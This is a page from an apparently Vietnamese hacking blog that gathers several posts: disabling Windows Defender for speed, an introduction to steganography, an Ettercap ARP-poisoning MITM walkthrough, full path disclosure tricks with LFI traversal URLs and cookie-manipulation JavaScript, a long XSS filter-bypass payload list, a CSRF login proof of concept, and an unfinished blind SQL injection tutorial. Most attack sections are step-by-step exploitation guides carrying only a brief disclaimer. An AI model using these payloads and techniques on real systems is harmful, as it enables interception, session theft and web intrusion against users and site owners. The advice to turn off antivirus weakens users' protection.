Home Blog Page 2

Tăng tốc Windows 10 hiệu quả bằng cách tắt Windows Defender

0

Tắt Windows Defender để tăng tốc máy tính dùng Win 10

Windows Defender Antivirus là giải pháp bảo mật mặc định được tích hợp trên tất cả các phiên bản hệ điều hành Windows 10. Về cơ bản Windows Defender Antivirus giúp bảo vệ máy tính người dùng khỏi các phần mềm độc hại bao gồm trojan và virus, rootkit, các phần mềm gián điệp (spyware) và nhiều dạng thức tấn công máy tính Windows khác. Dưới đây Taimienphi.vn sẽ hướng dẫn bạn cách thiết lập Windows Defender để tăng khả năng phòng vệ.

Nếu máy tính của bạn đang có dấu hiệu chạy chậm, bạn có thể tạm tắt Windows Defender đi để tăng tốc. Điều này đặc biệt hữu ích, cần thiết nếu hệ thống đã cài đặt một trình antivirus của hãng khác.

Cách 1 tắt windows defender win 10 creator

Phiên Bản Windows 10 Creators Update Version 1703 Đã Mang Lại Nhiều Thay Đổi Cho Giao Diện Người Dùng Của Windows 10. Có Một Ứng Dụng Mới Là Windows Defender Security Center – Ứng Dụng Trước Đây Được Gọi Là Windows Defender Dashboard, Đã Được Tạo Ra Để Giúp Người Dùng Kiểm Soát Các Cài Đặt Bảo Mật Một Cách Rõ Ràng Và Hữu Ích. Windows Defender Security Center Khởi Động Cùng Windows, Và Luôn Chạy Ngầm, Nếu Bạn Muốn Tắt Nó Đi, Hãy Làm Theo Các Bước Đơn Giản Dưới Đây:

Bước 1: Mở Task Manager, chuyển qua tab Startup
Bạn có thể sử dụng câu lệnh sau để mở nhanh Startup trong Task Manager:
taskmgr /0 /startup
Bước 2: Tìm đến Windows Defender notification icon, nhấn chuột phải vào chọn Disable
Bước 3: Khởi động lại máy xem kết quả

Cách 2 Để tắt Windows Defender trên Win 10, bạn thực hiện như sau:

Bước 1: Mở hộp thoại Run bằng cách bấm chuột phải vào biểu tượng Windows

Bước 2: Tại hộp thoại Run, bạn nhập vào gpedit.msc

Bước 3: Tại hộp thoại Local Group Policy Editor, các bạn triuy cập theo đường dẫn Computer Configuration/Administrative Templates/Windows Components/Windows Defender.

Bước 4: Bấm chuột vào Windows Defender, sau đó kéo xuống chọn Turn off Windows Defender

Bước 5: Tại hộp thoại Turn off Windows Defender mới hiện ra, các bạn chọn Enable.

Sau đó bấm Apply và OK là xong.

Nếu muốn kích hoạt lại, bạn cũng thao tác tương tự như các bước 1 đến 4 và chọn Disabledở bước 5. Bạn nên tắt Windows Defender trước khi cài phần mềm bảo vệ của các hãng khác.

 

loading...

Giới thiệu kỹ thuật giấu tin trong ảnh Steganography

0

1. Giới thiệu

Ngày nay chúng ta thường nghe nói đến Steganography. Đó là một hình thức che dấu sự tồn tại của thông điệp. Khác với Cryptography thì Steganography ẩn đi các thông tin cần giữ bí mật trong các dữ liệu vô hại để đối phương không thể biết được sự hiện diện của thông điệp.

Thực chất Steganography đã được con người biết tới từ rất lâu rồi. Năm 440 trước công nguyên, người Herodotus (Người Hy Lạp xa xưa) đã cạo trọc đầu các nô lệ tin cậy rồi xăm lên đó các thông điệp và chờ tóc mọc lại. Mục đích của việc này là nhằm gửi tin đi trong cuộc chiến tranh giữa người Herodotus và Persians (Người Ba Tư).

Trong cuộc cách mạng của Mỹ, mực không màu cũng được sử dụng để trao đổi thông điệp giữa người Mỹ và người Anh.

Trong các cuộc chiến tranh thế giới, Steganography cũng được sử dụng. Người Đức đã sử dụng mực không màu để viết các dấu chấm nhỏ lên phía trên và dưới các chữ cái bằng cách thay đổi chiều cao các chữ trong đoạn văn bản. Trong chiến tranh thế giới thứ nhất, các tù nhân cũng sử dụng mã Morse để gửi thư về nhà bằng cách viết các dấu chấm và gạch ngang lên các chữ cái i,j,t,f.

Trong chiến tranh thế giới thứ 2, các gián điệp của Đức đã sử dụng đoạn văn bản sau:

“Apparently neutral’s protest is thoroughly discounted and ignored. Isman hard hit. Blockade issue affects for pretext embargo on by-products, ejecting suets and vegetable oils.”

Bằng cách đọc những chữ thứ 2 của các từ ta sẽ được đoạn thông điệp sau:

“Pershing sails for NY June 1”.

Ngày nay trên mạng có rất nhiều đoạn nhạc hay các bức hình tưởng chừng như bình thường nhưng nó lại chứa các thông tin hoàn toàn bí mật. Điều này càng làm cho Steganography càng trở nên phổ biến.

Dưới đây là hình ảnh minh họa cho điều này:

Bức ảnh trên có chứa một thông điệp mà nếu chỉ nhìn bằng mắt thường thì khó có thể nhận thấy được.

2. Quá trình mã hóa và giải mã của Stegranography

Tiếp theo ta sẽ cùng tìm hiểu về ẩn thông tin trong Steganography. Đầu tiên, thông điệp và bức ảnh ban đầu sẽ được đưa vào trong bộ mã hóa (encoder). Trong bộ mã hóa, một bộ giao thức sẽ được thực thi để nhúng thông điệp vào trong bức ảnh. Kiểu của giao thức sẽ phụ thuộc vào kiểu của thông điệp và cách ta nhúng. Ví dụ hình dưới đây sẽ cho ta thấy giao thức để ẩn thông điệp trong các bức ảnh.

Khóa là cần thiết trong quá trình giấu thông tin. Người gửi có thể dùng khóa chính để mã hóa và người nhận có thể dùng khóa công khai để giải mã. Điều này có thể giảm thiểu khả năng bên thứ 3 biết được thông điệp và giải mã.

3. Một số cơ chế trong Stegranography

3.1 Cơ chế ẩn thông điệp trong văn bản hoặc đoạn ký tự

Đối với các tài liệu giấy thì khi bạn copy, bạn có thể sẽ không vi phạm bản quyền vì chất lượng của các tài liệu này khác nhau. Tuy nhiên đối với các tài liệu trên máy tính thì các bản copy sẽ giống hệt các bản gốc nên bạn rất dễ vi phạm bản quyền. Sở dĩ có thể biết được là o trong các tài liệu này đã được chèn thêm vào một số đoạn text để đánh dấu. Những đoạn này là ẩn với người dùng và bằng mắt thường khó có thể nhận biết được. Chúng ta chỉ có thể giải mã nhờ máy tính thì mới có thể nhìn thấy được.

Dưới đây  là một số cách để ẩn đoạn text trong văn bản.

3.1.1 DỊCH CHUYỂN VỊ TRÍ  DÒNG

Chúng ta sẽ dịch chuyển vị trí của các dòng một khoảng nhỏ khoảng 1/300 inch. Điều này rất khó có thể phát hiện bằng mắt thường vì khoảng cách thay đổi khá nhỏ. Chúng ta chỉ có thể phát hiện nhờ máy tính bằng cách đo khoảng cách giữa các dòng. Trong các khoảng trống đó ta có thể chèn vào các bit 0 hoặc 1, do đó trong toàn bộ văn bản, ta có thể ẩn đi một lượng thông tin khá lớn.

3.1.2 DỊCH CHUYỂN VỊ TRÍ TỪ

Cơ chế này cũng giống như dịch chuyển vị trí dòng, nhưng ta sẽ dịch chuyển vị trí các từ. Sau đó tùy vào khoảng trống đó nằm bên trái hay bên phải từ mà ta quy định nó là bit 0 hay bit 1. Dịch trái sẽ là bit 0 còn dịch phải sẽ là bit 1.

Dưới đây là một ví dụ:

Trong ví dụ trên, dòng thứ nhất các chữ có vị trí không bị thay đổi. Còn dòng thứ 2 các chữ bị dịch trái hoặc phải để mã hóa cho chuỗi 01000001(65-A). Nếu không so sánh với chuỗi ban đầu thì ta khó có thể nhận biết được chuỗi đó có bị thay đổi hay không.

3.1.3 CHÈN VÀO KHOẢNG TRẮNG CUỐI MỖI DÒNG

Một cách khác để ẩn đoạn text là sử dụng các khoảng trắng. Bằng cách vận dụng khéo léo các khoảng trắng, ta có thể lưu trữ được một lượng lớn các bit. Các khoảng trắng ở cuối mỗi dòng có thể bị bỏ qua và không hiện lên các bởi các ứng dụng đọc văn bản. Trong toàn bộ văn bản, ta có thể có đủ không gian để lưu trữ chuỗi bí mật. SNOW là một chương trình sử dụng cơ chế này. Bạn có thể tham khảo theo link sau:  http://www.darkside.com.au/snow/index.html.

3.1.4 ẨN THÔNG ĐIỆP TRONG NỘI DUNG CỦA CÁC ĐOẠN VĂN BẢN KHÁC

Một trong những cách khác để ẩn thông điệp là ta thay đổi cấu trúc của văn bản ban đầu sao cho nghĩa không bị thay đổi để mà ta có thể lưu trữ được thông điệp. TextHide là một chương trình sử dụng cơ chế này. Bạn có thể truy nhập vào link sau và tìm hiểu thêm: http://www.compris.com/TextHide/en/.

Ngoài ra ta có thể ẩn thông điệp trong các đoạn email spam. Điểu này có thể thực hiện bởi chương trình SpamMimic theo link sau: http://www.spammimic.com.

Ở đây mình sẽ thêm chuỗi “Hi ! How are you ?” vào email spam:

Khi đó ta được email sau:

3.2 Cơ chế ẩn thông điệp trong tệp tin âm thanh

Định dạng MP3 là định dạng phổ biến của các file nhạc.Do đó ta có thể sử dụng chúng để ẩn các đoạn text trong đó.Có nhiều công cụ có thể giúp bạn ẩn thông tin trong file .MP3 và  MP3Stego là một chương trình trong số đó. Dưới đây là giao diện của chương trình này:

Khi ẩn thông điệp bạn cần phải chọn thông điệp là file có định dạng .txt và file âm thanh có định dạng .wav. Bạn có thể dùng phần mềm để chuyển đổi file âm thanh từ định dạng .mp3 về .wav.

Bạn cần chọn file .mp3 đã bị ẩn thông điệp ở trong rồi click vào button “DECODE FILE”. Khi đó file .txt của bạn sẽ được tách ra khỏi file nhạc .mp3.

Trong phần trên mình đã trình bày với các bạn tổng quan về SteganoGraphy và một số cơ chế cơ bản để ẩn thông điệp trong các file văn bản, hình ảnh, âm thanh. Trong phần sau mình sẽ trình bày kỹ hơn về cơ chế ẩn thông điệp trong file ảnh.

Tài liệu tham khảo:

  1. Steganography and Digital Watermarking
  2. https://en.wikipedia.org/wiki/Steganography
  3. Một số tài liệu khác trên Internet.

Source : https://securitydaily.net/gioi-thieu-ky-thuat-giau-tin-trong-anh-steganography/

loading...

Cách thực hiện tấn công MITM (Man-In-The-Middle Attack ) bằng Ettercap

3

Hiện nay do nhu cầu pentest tăng cao, số lượng tool được viết ra để phục vụ mục đích nghiên cứu ngày càng nhiều. MITM là kĩ thuật cũng rất được quan tâm và được các developer & hacker bổ sung hàng tá tool trong thời gian ngắn.

Với kĩ thuật MITM, khi một hacker thực hiện thành công MITM trên một mạng máy tính, hacker này có thể dễ dàng thực hiện lại việc này trên nhiều mạng máy tính khác nhau.

Kết quả từ mỗi cuộc tấn công mạng mang lại đôi khi gồm khá nhiều thứ hay ho, từ thông tin tài khoản, hội thoại, email và nhiều thông tin nhạy cảm khác. Trong bài viết này thì mình sẽ hướng dẫn tấn công MITM bằng công cụ Ettercap có sẵn trên Kali Linux

MITM là gì ?

Tấn côngMITM là kĩ thuật mà hacker đặt mình vào giữa một người dùng khác ( victim) và một ứng dụng ( application). Có thể là xen vào giữa cuộc điện thoại hoặc xen vào giữa cuộc chat, và mọi thứ không có gì thay đổi khiến người dùng không thể nhận ra là có người đang xen vào giữa. Mục tiêu của hacker thường là người dùng các trang thương mại điện tử, ngân hàng,..

Ettercap là gì?

Ettercap là một công cụ chuyên nghiệp có thể giúp bạn giả mạo các kết nối, giả mạo DNS,..Ettercap giúp bạn trung gian giữa các cuộc tấn công trong mạng LAN. Nó có tính năng đánh hơi các các kết nối trực tiếp, lọc nội dung chuyển trên mạng và nhiều thủ thuật thú vị khác. . sự tìm tòi, nghiên cứu và thử nghiệm một số công cụ phần mềm hỗ trợ

Chú ý : Đây là bài hướng dẫn pentest, bạn sẽ phải chịu trách nhiệm với những gì bạn làm !

1. Enable Packet Forwarding In Kali Linux

Để bắt đầu thực hành, bạn hãy mở Kali lên và login ( nên login với quyền root). Tài khoản mặc định của Kali là root và mật khẩu là toor

Chúng ta cần forward toàn bộ các gói tin IPV4 vì hệ thống mục tiêu cần đảm bảo kết nối liên tục khi chúng ta tấn công ARP poisoning.

forward kali linux ipv4

Để làm được điều này, bạn mở terminal lên và gõ

systctl -w net.ipv4.ip_forward=1

Hoặc

echo 1 > /proc/sys/net/ipv4/ip_forward

2. Chỉnh sửa file config Ettercap

Để sử dụng Ettercap thì bạn cần sửa file config bằng lệnh sau

Khi mở file lên thành công, bạn cần chú ý tới hai dòng sau phần “[privs]

Bạn hãy sửa hai số 65534 về thành số 0

Tiếp theo đó bạn bấm tìm kiếm và tìm với cụm từ iptables

Sau khi tìm, bạn cần bỏ comment hai dòng “#redir_command_on” và “#redir_command_off

Sau đó lưu lại và thoát file config của Ettercap.

Xem thêm : Hack Wifi dễ dàng với Lazy Script

Khởi động Ettercap-gtk MITM

Để mở Ettercap với giao diện đồ họa, bạn mở terminal và gõ lệnh

ettercap -G

Đi tới thanh công cụ, chọn Sniff và chọn Unified Sniffing

Một popup hiện lên yêu cầu bạn chọn interface, bạn hãy chọn interface mà đang kết nối với mạng bạn cần test. Trong bài viết này mình sử dụng “eth0”. Lựa chọn của bạn có thể khác.

Bắt đầu tìm kiếm hosts

Ở trong phần log ở cuối chương trình bạn có thể thấy Ettercap đã khởi động attack mode : “Starting Unified Sniffing“.

Bấm vào Hosts > Scan For Hosts để quét các hosts đang nằm trong mạng. Một số thông báo sẽ hiện ra ví dụ

Randomizing # hosts for scanning

Scanning the whole netmask for # hosts

# hosts added to the host list

Thêm IP của router và IP của target system vào Ettercap

Mở thanh toolbar lên, click “Hosts“, và chọn “Hosts list“. Sau đó chọn IP và bấm Add to target 1. Tương tự Add to target 2

Bắt đầu tấn công ARP Poisoning

Bạn bấm chọn MITM > ARP Poisoning

MITM Attack: ARP Poisoning
Sniff remote connections

Một box hiện lên, bạn tích vào Sniff remote connections.

Bắt đầu sniffing để Arp Poison target và router

Đợi một chút để Ettercap tiến hành attack hệ thống.

Chúc bạn thành công <3

Notes : Để quay trở về trạng thái cũ và tắt ip forwarding thì bạn gõ lệnh sau :

systctl -w net.ipv4.ip_forward=0

loading...

Sơ lược về Full path disclosure ( FPD )

0
SƠ LƯỢC VỀ FULL PATH DISCLOSURE ( FPD )

Hello mọi người, vừa hôm qua thì mình có viết bài hướng dẫn một số thủ thuật về XSS, các bạn có thể xem lại tại đây

Nay mình giới thiệu tiếp với các bạn về một lỗi cũng rất phổ biến đó là Full Path Disclosure. Tới phần chính luôn nào.

1) Giới thiệu chung

Full path disclosure là một lỗi không quá lớn. Nhưng đôi khi nó quyết định cả vấn đề có thể khai thác được tiếp hay là không.FPD cho phép ta xác định được đường dẫn trong server.Từ đó giúp khai thác nhanh hơn, ví dụ như khi ta khai thác LFI chẳng hạn. Nếu như folder thay đổi.Ta có thể dùng cách này để xác định.

http://site.com/index.php?page=../../../../../../../home/example/public_html/includes/config.php

Nhìn vào đường dẫn trên ,để đọc được file config bằng kĩ thuật LFI (Local File Inclusion ) trước tiên ta phải xác định đc đường dẫn đến nó.Và FPD là một phương pháp giúp ta đi nhanh hơn trong việc này. ( Còn tới đâu thì mình chưa biết :))

2) Cách khai thác.

Việc tận dụng và khai thác FPD còn tùy thuộc vào nhiều yếu tố khác. Ví dụ đối với một số mã nguồn mở phổ biến thì mình có thể tham khảo để xác định được đường dẫn tới file mình cần. Ví dụ với Vbulletin 4.x hoặc 5.x thì bạn có thể check qua một số đường dẫn phổ biến sau :

/includes/api/commonwhitelist_2.php /includes/api/commonwhitelist_5.php /includes/api/commonwhitelist_6.php /includes/api/1/album_album.php /includes/api/1/album_editalbum.php /includes/api/1/album_latest.php /includes/api/1/album_overview.php /includes/api/1/album_picture.php /includes/api/1/album_user.php /includes/api/1/announcement_edit.php /includes/api/1/announcement_view.php /includes/api/1/api_cmscategorylist.php /includes/api/1/api_cmssectionlist.php /includes/api/1/api_forumlist.php /includes/api/1/api_getnewtop.php /includes/api/1/api_getsecuritytoken.php /includes/api/1/api_getsessionhash.php /includes/api/1/api_init.php /includes/api/1/api_mobilepublisher.php /includes/api/1/api_usersearch.php /includes/api/1/blog_blog.php /includes/api/1/blog_bloglist.php /includes/api/1/blog_comments.php /includes/api/1/blog_custompage.php /includes/api/1/blog_dosendtofriend.php /includes/api/1/blog_list.php /includes/api/1/blog_members.php /includes/api/1/blog_post_comment.php /includes/api/1/blog_post_editblog.php /includes/api/1/blog_post_editcomment.php /includes/api/1/blog_post_edittrackback.php /includes/api/1/blog_post_newblog.php /includes/api/1/blog_post_postcomment.php /includes/api/1/blog_post_updateblog.php /includes/api/1/blog_sendtofriend.php /includes/api/1/blog_subscription_entrylist.php /includes/api/1/blog_subscription_userlist.php /includes/api/1/blog_usercp_addcat.php /includes/api/1/blog_usercp_editcat.php /includes/api/1/blog_usercp_editoptions.php /includes/api/1/blog_usercp_editprofile.php /includes/api/1/blog_usercp_modifycat.php /includes/api/1/blog_usercp_updateprofile.php /includes/api/1/editpost_editpost.php /includes/api/1/editpost_updatepost.php /includes/api/1/forum.php /includes/api/1/forumdisplay.php /includes/api/1/inlinemod_domergeposts.php /includes/api/1/list.php /includes/api/1/login_lostpw.php /includes/api/1/member.php /includes/api/1/memberlist_search.php /includes/api/1/misc_showattachments.php /includes/api/1/misc_whoposted.php /includes/api/1/newreply_newreply.php /includes/api/1/newreply_postreply.php /includes/api/1/newthread_postthread.php /includes/api/1/newthread_newthread.php /includes/api/1/poll_newpoll.php /includes/api/1/poll_polledit.php /includes/api/1/poll_showresults.php /includes/api/1/private_editfolders.php /includes/api/1/private_insertpm.php /includes/api/1/private_messagelist.php /includes/api/1/private_newpm.php /includes/api/1/private_showpm.php /includes/api/1/private_trackpm.php /includes/api/1/profile_editattachments.php /includes/api/1/profile_editoptions.php /includes/api/1/profile_editprofile.php /includes/api/1/register_addmember.php 

/includes/api/1/register_checkdate.php /includes/api/1/search_process.php /includes/api/1/search_showresults.php /includes/api/1/showthread.php /includes/api/1/subscription_addsubscription.php /includes/api/1/subscription_editfolders.php /includes/api/1/subscription_viewsubscription.php /includes/api/1/threadtag_managetags.php /includes/api/2/album_picture.php /includes/api/2/api_blogcategorylist.php /includes/api/2/blog_blog.php /includes/api/2/blog_bloglist.php /includes/api/2/blog_list.php /includes/api/2/blog_subscription_entrylist.php /includes/api/2/blog_subscription_userlist.php /includes/api/2/blog_usercp_groups.php /includes/api/2/content.php /includes/api/2/editpost_editpost.php /includes/api/2/forumdisplay.php /includes/api/2/member.php /includes/api/2/newreply_newreply.php /includes/api/2/forum.php /includes/api/2/poll_newpoll.php /includes/api/2/poll_polledit.php /includes/api/2/poll_showresults.php /includes/api/2/private_messagelist.php /includes/api/2/private_trackpm.php /includes/api/2/profile_editattachments.php /includes/api/2/search_showresults.php /includes/api/2/showthread.php /includes/api/3/api_gotonewpost.php /includes/api/4/album_user.php /includes/api/4/api_forumlist.php /includes/api/4/api_getnewtop.php /includes/api/4/breadcrumbs_create.php /includes/api/4/facebook_getforumid.php /includes/api/4/facebook_getnewforummembers.php /includes/api/4/get_vbfromfacebook.php /includes/api/4/login_facebook.php /includes/api/4/newreply_postreply.php /includes/api/4/newthread_postthread.php /includes/api/4/register.php /includes/api/4/register_addmember.php /includes/api/4/search_findusers.php /includes/api/4/subscription_viewsubscription.php /includes/api/5/api_init.php /includes/api/6/api_getnewtop.php /includes/api/6/api_gotonewpost.php /includes/api/6/content.php /includes/api/6/member.php /includes/api/6/newthread_newthread.php /includes/block/blogentries.php /includes/block/cmsarticles.php /includes/block/html.php /includes/block/newposts.php /includes/block/sgdiscussions.php /includes/block/tagcloud.php /includes/block/threads.php /forumrunner/include/subscriptions.php /forumrunner/include/search_forum.php /forumrunner/include/profile.php /forumrunner/include/post.php /forumrunner/include/pms.php /forumrunner/include/online.php /forumrunner/include/moderation.php /forumrunner/include/misc.php /forumrunner/include/login.php /forumrunner/include/get_thread.php /forumrunner/include/get_forum.php /forumrunner/include/cms.php /forumrunner/include/attach.php /forumrunner/include/announcement.php /forumrunner/include/album.php /forumrunner/support/vbulletin_methods.php /forumrunner/support/stringparser_bbcode.class.php /forumrunner/support/utils.php /forumrunner/support/other_methods.php /packages/skimlinks/hooks/postbit_display_complete.php /packages/skimlinks/hooks/showthread_complete.php /packages/skimlinks/hooks/userdata_start.php

Đối với các mã nguồn khác như wordpress hay joomla cũng đều có những đường dẫn như này. ( Blog mình cũng chạy trên nền wordpress, khuyến khích các bạn không nên thử vì sau này không còn chỗ để đọc bài nữa)
Tuy nhiên, nếu website không sử dụng mã nguồn mở thì ta có thể kiểm tra bằng 1 trong 3 phương pháp sau.
+ Empty array: Thêm vào một empty array để yêu cầu in ra một thông báo.
Ví dụ như thêm [] vào cuối biến index.php?page=home chẳng hạn.
Khi ta thêm vào index.php?page[]=home sẽ nhận được thông báo như sau:

Warning: include_once() [function.include]: Failed opening ” for inclusion (include_path=’.:/usr/local/php5/lib/php’) in/home/content/37/4936137/html/template.php on line 40

Nó có chỉ cho ta thấy đường dẫn /home/content/37/4936137/html/template.php từ đó có thể suy đoán ra đường dẫn file mà ta cần.Hoặc suy đoán được ra đường dẫn đến root folder.

+Null Session Cookie:

Một phương pháp phổ biến khác để đưa ra yêu cầu thông báo lỗi trong đó có chứa full path đó là dùng JS Injection (ở đây dùng Null Session Cookie)
Đoạn code JS để get thông báo lỗi trên site có thể mô tả với dạng như sau 

javascript:void(document.cookie=’PHPSESSID=’);
hoặc javascript:alert(document.cookie=”PHPSESSID=”);

Trong đó PHPSESSID được set bằng giá trị null. Như vậy chúng ta có thể nhận được một lời cảnh báo như sau

Warning: session_start() [function.session-start]: The session id contains illegal characters, 
valid characters are a-z, A-Z, 0-9 and ‘-,’ in /home/example/public_html/includes/functions.php on line 2

+ Invalid Session Cookie

Tương tự như Null Session Cookie một session với PHPSESSID dược set >128 byte cũng sẽ cho ra thông báo lỗi với FPD.

javascript:void(document.cookie=’PHPSESSID=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA’);

Một kiểu khác cũng có tác dụng tương tự 

javascript:void(document.cookie=’PHPSESSID=.’);

ta có thể sử dụng một số tool để khai thác full path disclosure như inspathx ( link tải ở đây https://code.google.com/p/inspathx/)

3) Cách phòng chống.

Để phòng chống khai thác full path disclosure ta có thể ngăn chặn việc đưa ra thông báo lỗi bằng việc set trong php.ini

error_reporting(0);
display_errors = ‘off’;

Hoặc trong php script thực hiện 
ini_set(‘display_errors’,false);

Trong httpd.conf/apache2.conf set 
php_flag display_errors off

loading...

Một số thủ thuật vượt qua filter XSS

2
XSS payload list
XSS payload list

XSS là một trong những lỗi phổ biến nhất trên webapp ngày nay và chưa có dấu hiệu giảm đi. Cách để phòng chống XSS đa số các website thường áp dụng đó là dùng các filter để loại bỏ các dấu đóng mở ngoặc hoặc dùng Regex. Tuy nhiên kể cả khi đã xài các filter này thì vẫn luôn có một cách nào đó để vượt qua được nó 😀

Một số thay đổi cơ bản

Mình sẽ bắt đầu thử với một số cách để bypass những bộ lọc đơn giản nhất. Hầu hết cách chúng ta sử dụng để test XSS là sử dụng một số đoạn mã như sau. Nếu webapp dính lỗi XSS thì sẽ xuất hiện một popup in ra số 1.

<script>alert(1)</script>

Một số ví dụ đơn giản, ta có thể thêm dấu cách vào trong thẻ script như sau

<script >alert(1)</script>
<script	    >alert(1)</script>

Và như sau

<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>

Như vậy, mình có thể chèn một dòng mới, hoặc một lệnh xuống dòng để kết thúc thẻ script nhưng vẫn thực thi được XSS. Trong một số trường hợp khác thì viết hoa một số chữ trong thẻ cũng có thể đánh lừa được filter như

<ScRipT>alert(1)</sCriPt>

Insert một vài kí tự null ở trong payload cũng có thể mang lại kết quả tương tự

<%00script>alert(1)</script>
<script>al%00ert(1)</script>

Thay đổi thuộc tính hoặc thẻ

Ví dụ, với một thẻ input như sau cho thuộc tính value

<input type="text" name="input" value="hello">

Ta có thể kết thúc thẻ value sau đó chèn code XSS như sau

<input type="text" name="input" value="><script>alert(1)</script>

Tương tự như phần trên ta có một số biến thể khi chèn null hoặc chèn dấu cách vào như sau

<input/type="text" name="input" value="><script>alert(1)</script>
<input&#9type="text" name="input" value="><script>alert(1)</script>
<input&#10type="text" name="input" value="><script>alert(1)</script>
<input&#13type="text" name="input" value="><script>alert(1)</script>
<input/'type="text" name="input" value="><script>alert(1)</script>
<iNpUt type="text" name="input" value="><script>alert(1)</script>
<%00input type="text" name="input" value="><script>alert(1)</script>
<inp%00ut type="text" name="input" value="><script>alert(1)</script>
<input t%00ype="text" name="input" value="><script>alert(1)</script>
<input type="text" name="input" value="><script>a%00lert(1)</script>

Xử lí sự kiện

Một số event có thể được sử dụng để khai thác XSS như

<input onsubmit=alert(1)>
<object onerror=alert(1)>
<body onactivate=alert(1)>
<body onfocusin=alert(1)>
<script onreadystatechange=alert(1)>
<input autofocus onfocus=alert(1)>

Một số event không cần người dùng thao tác ví dụ như onready hoặc onactive. Những sự kiện này có thể tự động được load khi người dùng tải trang dẫn tới thực thi mã XSS mà người dùng không thể kiểm soát được.

Khi HTML5 được phát hành, nó cũng được các hacker khai thác với một số kĩ thuật XSS như

<audio src="new.mp3" onerror=alert(1)>
<video src="new.mp4" onerror=alert(1)>
<svg width="200" height="100" onload=alert(1)>

Trên đây là một số kĩ thuật để giúp bạn bypass được những bộ lọc XSS cơ bản. Khi một bộ lọc mới được sinh ra để filter đi những payload cũ thì chắc chắn sẽ có những payload mới được sinh ra để bypass đó. Chúc bạn thành công.

Dưới đây là một số mẫu payload khác để các bạn có thể thử:

<img onerror="alert(1)"src=x>
<img onerror='alert(1)'src=x>
<img onerror=&#34alert(1)&#34src=x>
<img onerror=&#39alert(1)&#39src=x>
<img onerror=`alert(1)`src=x>
<img onerror=&#96alert(1)&#96src=x>
<img src=`x`onerror=alert(1)>
<<script>alert(1)//<</script>
<input onsubmit=alert(1)<
«input onsubmit=alert(1)»
&#174input onsubmit=alert(1)&#175
<a href="javascript:alert(1)">Click Here</a>
<img src=javascript:alert(1)>
<form action=javascript:alert(1)>
<object data=javascript:alert(1)>
<button formaction=javascript:alert(1)>
<video src=javascript:alert(1)>
loading...

Khi Cookie Hijacking + HTML Injection trở nên nguy hiểm

0

Chào các bạn,

Hôm nay mình sẽ chỉ với các bạn cách mà mình gặp một lỗi html injection, và cách mình biến nó thành lỗi nghiêm trọng với kĩ thuật cookie hijacking.

Đôi điều về HTML Injection và Cookie Hijacking:

HTML injection là một lỗi giúp hacker có thể chèn được mã HTML vào website và thực thi đoạn mã đó trên trình duyệt của người dùng. Lỗi này có thể dẫn tới rất nhiều hệ lụy kể cả việc đánh cắp cookie.

Session Hijacking là hình thức tấn công vào phiên làm việc giữa client và server cách đánh cắp cookie của người sử dụng sau khi họ đã qua bước xác thực với máy chủ, sau đó sẽ chiếm quyền điều khiển của phiên làm việc này

Giai đoạn 1: Khám phá

Lần này mình đã thực hiện test lần lượt trên từng input ở trang người dùng. Nhận thấy rằng các đoạn input đã không được validate như mong đợi. Tuy nhiên làm sao để có thể khai thác lỗi này khi mà cần phải đăng nhập thì mới hiện ra những thông tin này?

Lần 1: Thử khai thác bằng lỗi CSRF, gửi một đoạn code để đăng nhập vào tài khoản cho victim

Ex:

<html>
<! - CSRF Login PoC ->
<body>
<script> history.pushState ('', '', '/') </ script>
<form action = "https://private-company.com/account/signin" method = "POST">
<input type = "hidden" name = "customerlogin" value = "attacker-email@gmail.com" />
<input type = "hidden" name = "customerpassword" value = "attacker-password" />
<input type = "submit" value = "Submit request" />
</ form>
</ body>
</ html>

Không quá khó để đoán trước kết quả, cách thực hiện này không thành công vì server đã thực hiện validate login bằng token.

Lần 2

Lần 2:

Cookie Hijacking! Tới cách này thì mình đã thành công vì cookie quản lí phiên đăng nhập không hề hết hạn sau khi mình bấm Logout. Cookie chỉ được xóa khi mình xóa nó bằng tay:I logged in with a test account and then I clicked “logout”. Note in the screenshot below that cookies were still stored in the browser after the logout:

Cookie not expired when click logout

 Mình copy cookie bằng Edit This Cookie (edit this cookie), sửa lại và nhanh chóng được chuyển tới trang người dùng

Như vậy là xong! Giờ đã đến lúc khai thác lỗi HTML Injection

Như mình đã nói ở trên, trường “customer_name” dính lỗi không validate input. Để xác thực việc này, mình đã intercept request bằng burp suite và dán 1 thẻ H1 vào ô name:

Như vậy là đã xong!

Bài viết mang tính chất tham khảo với mục đích học tập!

Chúc bạn thành công <3

loading...

Ví dụ về một cuộc tấn công SQL Injection – Blind SQL Injection

0

1. Tổng quan

Blind SQL Injection là một phương pháp thực hiện SQL Injection trong điều kiện các thông tin khai thác được không được trình bày trực tiếp trên nội dung phản hồi từ database. Blind SQL Injection dựa vào việc sử dụng các mệnh đề điều kiện để thực hiện suy luận thông tin cần khai thác. Cụ thể, Blind SQL Injection sử dụng chính các thông tin cần khai thác làm mệnh đề điều kiện (mệnh đề suy luận), và sử dụng các phương pháp khác nhau để “đánh dấu” trường hợp đúng/sai của mệnh đề đó. Căn cứ vào phương pháp “đánh dấu” trường hợp đúng/sai của mệnh đề quan hệ, ta chia ra hai cách chính thực hiện blind SQL Injection:

  • Dựa vào nội dung phản hồi (response-based)
  • Dựa vào độ trễ của thời gian phản hồi (time-based) Các phương pháp thực hiện blind SQL Injection có thể áp dụng cho các mô hình khác mà không gặp trở ngại nào, tuy nhiên chi phí thực hiện sẽ luôn cao hơn về mặt thời gian và số truy vấn cần thiết.

2. Thực hiện tấn công blind SQL Injection. Chèn, sửa, xóa dữ liệu.

a. Tìm kiếm lỗ hổng

Ví dụ tại trang web này, khi ta nhập id vào textField rồi bấm submit thì kết quả trả về firstname và lastname của user đó.

DWWA

Ta thử nhập:

1’ and 1=1 # thì được kết quả

Khi nhập

1’ and 1=0 #

Thì kết quả không được hiển thị

=> Có khả năng xuất hiện lỗ hổng bảo mật

Bây giờ chúng ta sẽ thực hiện khai thác database.

Công cụ sử dụng: Kali Linux, Burp suite, Sqlmap, Mozzila FireFox

Bước 1: Config proxy sang Manual Proxy sử dụng địa chỉ 127.0.0.1 và port 8080

Mozzila > Setting > Advanced > Network setting.

Chọn Manual Proxy Configuaration.

HTTP Proxy: 127.0.0.1 và Port: 8080 > OK.

Bước 2: Khởi động Burp Suite để bắt các resquest đến server từ cổng 127.0.0.1:8080

